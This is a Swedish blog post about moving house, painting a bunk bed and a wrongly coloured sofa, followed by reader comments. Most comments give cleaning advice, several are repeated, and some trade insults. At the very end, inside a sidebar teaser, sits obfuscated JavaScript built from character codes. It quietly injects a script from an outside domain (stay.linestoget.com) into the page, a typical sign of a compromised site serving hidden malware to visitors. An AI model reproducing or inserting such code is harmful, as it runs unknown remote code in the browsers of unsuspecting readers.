Tack för att du finns!

Hej fina!

TACK för alla fina ord och lyckönskningar!🙏🏻❤️ Dom betyder enormt mycket!!!

Idag har Lilleman och jag sovit sista natten i lägenheten. För ikväll ska han flyga till Teneriffa. Jag är SÅ glad att han får komma iväg på sportlovet och njuta av bad & bus istället för att kriga i flytten med mig! 😝

C0EA3C64-D737-412B-9B52-A2038CE4F629 B00144FC-2502-4D9F-9547-3E9804F45AF5

 Jag kommer köra på här nere i två dagar. Måla flytta så mycket som jag bara kan flytta själv…. Verkligen bestämma vad som ska till sthlm, och vad vi ska ha på vårat lantställe… ☺️

 sedan köra upp till Sthlm. Hem till Jonas och våran pågående renovering! (Vilken kämpe han är!🙌🏻) 

Jag har bokat in Möten, doktor, podd… för att sedan vända ner igen. Och då ta slutgiltiga flytten, besiktning osv…

En fråga, tycker ni att jag ska göra flyttstädning själv?  Vad hade du gjort?

Igår kom möblerna.

Samtidigt som farbror Lothar hjälpte mig med soffan så målade jag färdigt det sista på Ludvigs våningssäng. Med grundfärg. Sen gav vi oss på soffan tillsammans.

Nu ska det torka, sen ska jag ge mig på det igen! 

341CCE33-411E-4B24-897D-C755F510ECFB

C544949C-DAAB-411C-ADBE-A300A890A6C1

Jag gillar verkligen inte furu! Nu ska den bort! 👊🏻 Före/efter

(Obs, endast grundfärg än)  Nu ska den torka, sen ska jag ge mig på den igen! 

OLYMPUS DIGITAL CAMERA

C672F2BD-EFAE-47F9-88A8-81DFB7C7D54A 531566E7-8CD5-4B04-BC71-5EBFB19E1E0B

Det blir bra, det här! 😃 MEN, soffan!?!!! 😩 Grrrr!

Jag beställde en beige, men så kom det en grå!

-Tack furniturbox fär den! 🙈 SUCK!

0A1CA017-F048-4876-80F8-55C4C2138E72 00B254D5-5DD5-40E4-B7CB-C8F647B9CBF2

B9377266-B0D4-4203-B7C6-31273AA967FF

Nåja… en sak i taget. Du, återigen! TACK för att du finns 💖 Blir så glad för dina kommentarer, ditt Peppe och våran relation!

Kram på dig!

/My Martens 

110 Komentarer

 1. Som jag skrev i messet häromdan, dom är gnälliga vid besiktning så ska man göra själv får man inte slarva, hehe om man inte vet hur man kan fuska ?
  En firma har oftast 3 dagars garanti så gör dom gratis ”backjobb” på det som får nedslag på besiktningen. Kan ibland vara värt pengarna för den tryggheten om man har dåligt med tid osv.
  Annars tar ju din lägenhet 1-2 dagar å städa ensam, är ju kök å badrum som tar tid så har du den tiden så kör ???
  Blir himla mysigt i nya lilla huset, å soffan skitsnygg grå ju! ?
  Lycka till.

 2. Hej My!
  Lycka till med dina flyttbestyr! Jag hade alla gånger satsat på flyttstäd av en firma! Lägg din energi på annat istället! ?
  Kram och ha en fin dag!

 3. Bäst är väl att beställa flyttstädning om man har råd att lägga pengar på det. Finns inget tråkigare än flyttstädning i mitt tycke.

  • Till Sarah!
   ”Hur stort är huset du hyr ”
   Vilken extremt idiotisk fråga!! Vad har du och alla bloggläsare med att göra hur många kvadrat huset är?? Du ställer privata frågor som du inte har med att göra!

   • Det har man väl med att göra om saker läggs ut offentligt där alla kan läsa och hur länge som helst. Vill man ha sitt privatliv ifred får man låta bli att blogga eller bara blogga om neutrala saker.

    • Kära apnonym! Det är långt ifrån allt som jag delar med mig av. Jag har min integritet, min privata del och min offentliga del via bloggen….. stor skillnad! Vissa saker har ingen annan än jag och min familj med att göra. Som tex detta…. svårare än så är det inte ?

 4. Flyttstädning alla gånger! Lycka till med era boenden, det är ju toppen att få lite av varje, både lantliv och storstad även om jag förstår att det är jobbigt att pendla. ?

  • Håller absolut med Gunilla!
   Tveklöst! Ta en städfirma, det är värt vartenda öre, flyttstädning är bland det värsta som finns, allt ska vara petnoga och tar en oändlig tid, tar flera dagar att göra en avflyttningsstädning.

 5. Ser så mysigt ut!!!! Några op frågor . Hur stor skillnad på rehab var det på din första å andra op? Hur lång tid tog det innan du kunde ta en Pw efter första , hur lång tid efter första tog det att bli helt smärtfri?

 6. En till op fråga- hur kommer det sig att du hade dubbla gördlar i början? Både en som såg ut som cykelbyxor å den andra!hur länge hade de båda?

 7. Som jag skrev i messet häromdan, dom är gnälliga vid besiktning så ska man göra själv får man inte slarva, hehe om man inte vet hur man kan fuska 😉
  En firma har oftast 3 dagars garanti så gör dom gratis ”backjobb” på det som får nedslag på besiktningen. Kan ibland vara värt pengarna för den tryggheten om man har dåligt med tid osv.
  Annars tar ju din lägenhet 1-2 dagar å städa ensam, är ju kök å badrum som tar tid så har du den tiden så kör 😁👍🏻

  Blir himla mysigt i nya lilla huset, å soffan skitsnygg grå ju! 🌸
  Lycka till.

 8. Hej My!

  Lycka till med dina flyttbestyr! Jag hade alla gånger satsat på flyttstäd av en firma! Lägg din energi på annat istället! 🙂

  Kram och ha en fin dag!

 9. Innebär boendet att ni får nära till L:s skola och kompisar?
  Det är viktigt i hans ålder och framöver att man kan ta sig lätt till skola/vänner/aktiviteter?
  Eftersom jag arbetar i skolans värld ser jag ofta drömmen om landet och lantligt boende. Det brukar ändras när barnen är i 10-årsåldern och vill cykla till skola/vänner/träningar……….
  Några år kvar men inte fel att tänka långsiktigt.
  Teneriffa låter underbart just nu i detta kalla väder.
  Hoppas du får lugn och ro snart. Att ligga på soffan och göra ingenting är underskattat i dagens samhälle!

  • Hej ”tomtenissen” ! Jag ser en röd tråd i dina tidigare kommentarer. Alltid ifrågasättande, och ganska negativa. Men ändå en touch av vänlighet!
   Som jag skrev så kommer vi ha dubbla boenden. Ludvig kommer alltså även att vara mycket i Sthlm. Hela sommaren, alla lov och vissa helger. Hans bästa vänner bor där. Hör på öland är det avstånd mellan dom första. Hela öland är ”på landet”. Ja tror att det handlar om hur man är som förälder. Vad man prioriterar och hur man lägger upp det. Jag är van med just den logistiken. Det är dom flesta här nere… man slitsar, skolbussen tar ALLA barnen från skolan… det är ganska charmigt i sig. Cykla. Visst kommer han kunna göra det. 10 min från min lägenhet nu. Ja, ganska nära om vi möter i ölands mått ?

   • Det handlar säkert mycket om vana och bekvämlighet.
    Med ett friare yrke funkar det ju att skjutsa men med ett 8-16.30 jobb är det ju svårare.
    Jag kan vara säga att i Skåneorten där jag bor flyttar många in till samhällena igen när barnen är kring 10 år.
    Jag har bara lite undringar ibland.
    Trevlig mellokväll!

  • Till Malin!
   ”Innebär boendet att ni får nära till L:s skola och kompisar?”
   ”Det är viktigt i hans ålder och framöver att man kan ta sig lätt till skola/vänner/aktiviteter?”
   Vad faen har du med sådana privata frågor att göra???? Du ska väl fullständigt skita i om familjen har nära till skola o kompisar!
   Dessutom behöver väl för fasen inte du tala om för My vad som är viktigt i hans ålder!? Närheten till vänner? Närhet till skolan?
   Tror du inte att My med sin familj kan fatta egna beslut???
   Närhet till skolan? Hur tror de folk har det i övriga landet med den logistiken? Hur tror du folk får sina barn till skolan som bor låååångt ute på landet, och uppe i Norrland, lååångt från befolkning?
   Sluta upp att ställa sådana idiotiska frågor som ni gör, riktiga dumhuvud måste jag säga. Sköt för fasen ert eget istället och skit i andra!!

     • Till ”Anonym”
      Undrar vem som är troll här ”Anonym”?
      Spydigt påhopp? Det som är spydigt är att komma med pekpinnar till en mamma om huruvida barnet har långt till skolan? Om barnet har nära till vänner? Hur många kvadrat huset är på?
      Så otroligt korkade frågor, som så uppenbart är till för att starta elaka spekulationer. Man frågar inte någonting överhuvudtaget om ett barn! Basta!

  • Haha det finns barn som bor på landsbygden i hela Sverige.
   Jag hade EN MIL till närmaste barn i ungefär samma ålder… ve och fasa.

  • Men jösses! Vad sjutton ger dig rätten att ifrågasätta någons val av boende?! Att med läraryrket som grund dela ut pekpinnar och förmaningar till en förälder är riktigt lågt! Och väldigt oempatiskt. Tror du att alla ungar som bor ”på landet” far illa?! Stackars alla barn som inte bor mitt i storstaden eller ?

 10. Bäst är väl att beställa flyttstädning om man har råd att lägga pengar på det. Finns inget tråkigare än flyttstädning i mitt tycke.

  • Till Sarah!

   ”Hur stort är huset du hyr ”

   Vilken extremt idiotisk fråga!! Vad har du och alla bloggläsare med att göra hur många kvadrat huset är?? Du ställer privata frågor som du inte har med att göra!

   • Det har man väl med att göra om saker läggs ut offentligt där alla kan läsa och hur länge som helst. Vill man ha sitt privatliv ifred får man låta bli att blogga eller bara blogga om neutrala saker.

    • Kära apnonym! Det är långt ifrån allt som jag delar med mig av. Jag har min integritet, min privata del och min offentliga del via bloggen….. stor skillnad! Vissa saker har ingen annan än jag och min familj med att göra. Som tex detta…. svårare än så är det inte 😂

 11. Flyttstädning alla gånger! Lycka till med era boenden, det är ju toppen att få lite av varje, både lantliv och storstad även om jag förstår att det är jobbigt att pendla. 💞

  • Håller absolut med Gunilla!

   Tveklöst! Ta en städfirma, det är värt vartenda öre, flyttstädning är bland det värsta som finns, allt ska vara petnoga och tar en oändlig tid, tar flera dagar att göra en avflyttningsstädning.

 12. Ser så mysigt ut!!!! Några op frågor . Hur stor skillnad på rehab var det på din första å andra op? Hur lång tid tog det innan du kunde ta en Pw efter första , hur lång tid efter första tog det att bli helt smärtfri?

 13. En till op fråga- hur kommer det sig att du hade dubbla gördlar i början? Både en som såg ut som cykelbyxor å den andra!hur länge hade de båda?

 14. Innebär boendet att ni får nära till L:s skola och kompisar?

  Det är viktigt i hans ålder och framöver att man kan ta sig lätt till skola/vänner/aktiviteter?

  Eftersom jag arbetar i skolans värld ser jag ofta drömmen om landet och lantligt boende. Det brukar ändras när barnen är i 10-årsåldern och vill cykla till skola/vänner/träningar……….

  Några år kvar men inte fel att tänka långsiktigt.

  Teneriffa låter underbart just nu i detta kalla väder.

  Hoppas du får lugn och ro snart. Att ligga på soffan och göra ingenting är underskattat i dagens samhälle!

  • Hej ”tomtenissen” ! Jag ser en röd tråd i dina tidigare kommentarer. Alltid ifrågasättande, och ganska negativa. Men ändå en touch av vänlighet!

   Som jag skrev så kommer vi ha dubbla boenden. Ludvig kommer alltså även att vara mycket i Sthlm. Hela sommaren, alla lov och vissa helger. Hans bästa vänner bor där. Hör på öland är det avstånd mellan dom första. Hela öland är ”på landet”. Ja tror att det handlar om hur man är som förälder. Vad man prioriterar och hur man lägger upp det. Jag är van med just den logistiken. Det är dom flesta här nere… man slitsar, skolbussen tar ALLA barnen från skolan… det är ganska charmigt i sig. Cykla. Visst kommer han kunna göra det. 10 min från min lägenhet nu. Ja, ganska nära om vi möter i ölands mått 😄

   • Det handlar säkert mycket om vana och bekvämlighet.

    Med ett friare yrke funkar det ju att skjutsa men med ett 8-16.30 jobb är det ju svårare.

    Jag kan vara säga att i Skåneorten där jag bor flyttar många in till samhällena igen när barnen är kring 10 år.

    Jag har bara lite undringar ibland.

    Trevlig mellokväll!

  • Till Malin!

   ”Innebär boendet att ni får nära till L:s skola och kompisar?”

   ”Det är viktigt i hans ålder och framöver att man kan ta sig lätt till skola/vänner/aktiviteter?”

   Vad faen har du med sådana privata frågor att göra???? Du ska väl fullständigt skita i om familjen har nära till skola o kompisar!

   Dessutom behöver väl för fasen inte du tala om för My vad som är viktigt i hans ålder!? Närheten till vänner? Närhet till skolan?

   Tror du inte att My med sin familj kan fatta egna beslut???

   Närhet till skolan? Hur tror de folk har det i övriga landet med den logistiken? Hur tror du folk får sina barn till skolan som bor låååångt ute på landet, och uppe i Norrland, lååångt från befolkning?

   Sluta upp att ställa sådana idiotiska frågor som ni gör, riktiga dumhuvud måste jag säga. Sköt för fasen ert eget istället och skit i andra!!

     • Till ”Anonym”

      Undrar vem som är troll här ”Anonym”?

      Spydigt påhopp? Det som är spydigt är att komma med pekpinnar till en mamma om huruvida barnet har långt till skolan? Om barnet har nära till vänner? Hur många kvadrat huset är på?

      Så otroligt korkade frågor, som så uppenbart är till för att starta elaka spekulationer. Man frågar inte någonting överhuvudtaget om ett barn! Basta!

  • Haha det finns barn som bor på landsbygden i hela Sverige.
   Jag hade EN MIL till närmaste barn i ungefär samma ålder… ve och fasa.

  • Men jösses! Vad sjutton ger dig rätten att ifrågasätta någons val av boende?! Att med läraryrket som grund dela ut pekpinnar och förmaningar till en förälder är riktigt lågt! Och väldigt oempatiskt. Tror du att alla ungar som bor ”på landet” far illa?! Stackars alla barn som inte bor mitt i storstaden eller 😳

 15. Det kommer bli så fint! Snyggt m vita brädväggar. Haha.. förlåt men det m soffan e så tradigt men skrattar för en vän till mig hade beställt en svart soffa å va inte hemma när den kom utan föräldrarna va där å tog emot. Ville överraska henne å satte ihop den å när hon kom hem stod det en vit ?soffa i vardagsrummet. ?.
  Kul Å fixa när man i hjärtat känner att nu e ja hemma.
  Trevlig helg

 16. Alla ni jävla troll och inkompetenta filurer som skriver här. Känns det skönt i era hjärtan att skriva som ni gör till My? Lek med tanken: hur skulle det kännas om jag var My och fick sånt skrivet till mig… Gå o göm er…
  Ta flyttstädningen med firma. Det är rut-avdrag på det. Och så skönt att slippa när man härjat runt med allt annat.
  Kram

 17. Det kommer bli så fint! Snyggt m vita brädväggar. Haha.. förlåt men det m soffan e så tradigt men skrattar för en vän till mig hade beställt en svart soffa å va inte hemma när den kom utan föräldrarna va där å tog emot. Ville överraska henne å satte ihop den å när hon kom hem stod det en vit 🙈soffa i vardagsrummet. 😂.
  Kul Å fixa när man i hjärtat känner att nu e ja hemma.
  Trevlig helg

 18. Alltid lika intressant läsning ihop med lite tips och idéer.. Instämmer helt för övrigt gällande dina åsikter om furu ? ?
  Önskar dig och familjen en riktigt härlig lördag där hemma i Sverige.
  Kram:)

 19. Alla ni jävla troll och inkompetenta filurer som skriver här. Känns det skönt i era hjärtan att skriva som ni gör till My? Lek med tanken: hur skulle det kännas om jag var My och fick sånt skrivet till mig… Gå o göm er…
  Ta flyttstädningen med firma. Det är rut-avdrag på det. Och så skönt att slippa när man härjat runt med allt annat.
  Kram

 20. Alltid lika intressant läsning ihop med lite tips och idéer.. Instämmer helt för övrigt gällande dina åsikter om furu 🙂 😉
  Önskar dig och familjen en riktigt härlig lördag där hemma i Sverige.
  Kram:)

 21. Grå soffa….. skitsnyggt ! Behåll den.
  Klart du ska anlita flyttstädning, behöver inte kosta så mkt. Jag har flyttat två ggr och alltid anlitat städning. Inte värt slita ut sig.

 22. Alltså städa är ju hur tråkigt som helst. Och allra helst flyttstädning.
  Kan du så lej bort eländet.
  Spar dig både tid o ork 🙂

 23. Det kommer att bli hur bra som helst när ni har landat i flytten o alla renorveringar 😄 wow med landet o yoga runt husknuten 🙏❤️

 24. Hej My!
  Ta flyttstädning det är guld värt dessutom får du göra rutavdrag på det. Jag gjorde det för ca 1 är sedan 2 rum o kök plus fönsterputs, det gick på ca 2300 kronor. Men vill ju inte åka tillbaka till det gamla när flyttlasset gått.
  Lycka till o kram

 25. Grå soffa….. skitsnyggt ! Behåll den.
  Klart du ska anlita flyttstädning, behöver inte kosta så mkt. Jag har flyttat två ggr och alltid anlitat städning. Inte värt slita ut sig.

 26. Hej My!
  Ta flyttstädning det är guld värt dessutom får du göra rutavdrag på det. Jag gjorde det för ca 1 är sedan 2 rum o kök plus fönsterputs, det gick på ca 2300 kronor. Men vill ju inte åka tillbaka till det gamla när flyttlasset gått.
  Lycka till o kram

 27. Köp flyttstädningen. De bolag jag använder har också garanti. Om de nya hyresgästerna inte är nöjda så ingår det att de går tillbaka och gör om. Man orkar inte ha den diskussionen med dom

 28. Köp flyttstädningen. De bolag jag använder har också garanti. Om de nya hyresgästerna inte är nöjda så ingår det att de går tillbaka och gör om. Man orkar inte ha den diskussionen med dom

 29. Hej!
  Måste verkligen varna för att handla från Furtniturbox!
  Handlat två bord från dem. Båda som jag fick var fel dvs helt andra bord än de jag beställt. Mycket svåra att få kontakt med. Både per tele och mail. Allt ska dessutom fotas och skickas till dem. Även förpackningar ska fotas vara hela!? Hur lätt är det när man köpt ett stort matbord som i mitt fall. Bordet såg dessutom ut som ett andra sorterings vara. Hur kan det bli fel på två varor av två? Har efteråt förstått att det är mera en regel än ett undantag att de levererar fel. De måste leva på att de är svåra att nå och att de flesta inte orkar reklamera/paketera för att få rätt vara. Andra stora företag ex. Ikea, Ellos gör allt för att hjälpa sina kunder om det råkat bli någon miss eller om man vill returnera en vara av någon annan anledning. Utan att be om fotografier.

 30. Hej!
  Måste verkligen varna för att handla från Furtniturbox!

  Handlat två bord från dem. Båda som jag fick var fel dvs helt andra bord än de jag beställt. Mycket svåra att få kontakt med. Både per tele och mail. Allt ska dessutom fotas och skickas till dem. Även förpackningar ska fotas vara hela!? Hur lätt är det när man köpt ett stort matbord som i mitt fall. Bordet såg dessutom ut som ett andra sorterings vara. Hur kan det bli fel på två varor av två? Har efteråt förstått att det är mera en regel än ett undantag att de levererar fel. De måste leva på att de är svåra att nå och att de flesta inte orkar reklamera/paketera för att få rätt vara. Andra stora företag ex. Ikea, Ellos gör allt för att hjälpa sina kunder om det råkat bli någon miss eller om man vill returnera en vara av någon annan anledning. Utan att be om fotografier.

 31. Fast varför skälla om man ställer en fråga. Jag är också nyfiken på hur stor stugan är, inte av någon anledning alls mer än just nyfikenhet. Om den är 30 kvm eller 130 spelar mindre roll av anledningen att My ska bo där. Jag tänker mer hur många rum, 1 2 3 4 osv. Möblering inredning. Sånt är jag intresserad av. Är det bara ett enda rum, vad är felet? Det är inte så jag tänker när jag frågar. Fråga för att sen vara elak, då kan ni sluta fråga, då får ju inte vi som är intresserade av vänlighet och av genuint intresserade inte heller veta. Kan ni inte bara fara åt fanders ni som alltid måste vara elaka. Jag skulle om jag hade råd, välja flyttstädning, då får du tid över till annat. Att bo mil från kompisar….. Har ni som gnäller inte hört talas om bil, buss, cykel, mm. Finns väl inget barn som far illa av att få vänta med att träffa kompisar 10 min. My ser nog till att sin son mår bra. Jag får på allvar ont i magen när jag läser vissa kommentarer. Inte undra på att barn mobbar andra barn idag och att barn far illa i skolan, när vuxna beter sig så illa som dom gör i dessa kommentarsfält. Skit i dom My, du gör ett toppenjobb och jag smörar inte. Finns ingen anledning till det. Får väl påhopp nu när jag skriver. Sist, så älskar jag som sagt inredning och se hur andra löser saker så önskemål är bilder före och efter och under…. hehe. Hoppas på det och MY, skit i idoiterna.. Jag skriver idoiterna så får jag inte skit för att jag skriver fula ord. Det ordet finns inte.

 32. Fast varför skälla om man ställer en fråga. Jag är också nyfiken på hur stor stugan är, inte av någon anledning alls mer än just nyfikenhet. Om den är 30 kvm eller 130 spelar mindre roll av anledningen att My ska bo där. Jag tänker mer hur många rum, 1 2 3 4 osv. Möblering inredning. Sånt är jag intresserad av. Är det bara ett enda rum, vad är felet? Det är inte så jag tänker när jag frågar. Fråga för att sen vara elak, då kan ni sluta fråga, då får ju inte vi som är intresserade av vänlighet och av genuint intresserade inte heller veta. Kan ni inte bara fara åt fanders ni som alltid måste vara elaka. Jag skulle om jag hade råd, välja flyttstädning, då får du tid över till annat. Att bo mil från kompisar….. Har ni som gnäller inte hört talas om bil, buss, cykel, mm. Finns väl inget barn som far illa av att få vänta med att träffa kompisar 10 min. My ser nog till att sin son mår bra. Jag får på allvar ont i magen när jag läser vissa kommentarer. Inte undra på att barn mobbar andra barn idag och att barn far illa i skolan, när vuxna beter sig så illa som dom gör i dessa kommentarsfält. Skit i dom My, du gör ett toppenjobb och jag smörar inte. Finns ingen anledning till det. Får väl påhopp nu när jag skriver. Sist, så älskar jag som sagt inredning och se hur andra löser saker så önskemål är bilder före och efter och under…. hehe. Hoppas på det och MY, skit i idoiterna.. Jag skriver idoiterna så får jag inte skit för att jag skriver fula ord. Det ordet finns inte.

 33. Köp flyttstäda så slipper du ta skit om det blir nåt nedslag på städningen!!
  Tråkigt med soffan ? Den gråa är ju snygg men förstår om det känns fel om du beställt beige. Hoppas det löser sig för dig!!
  Kram kram ❤️ ❤️

 34. Köp flyttstäda så slipper du ta skit om det blir nåt nedslag på städningen!!
  Tråkigt med soffan 😕 Den gråa är ju snygg men förstår om det känns fel om du beställt beige. Hoppas det löser sig för dig!!
  Kram kram ❤️ ❤️

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/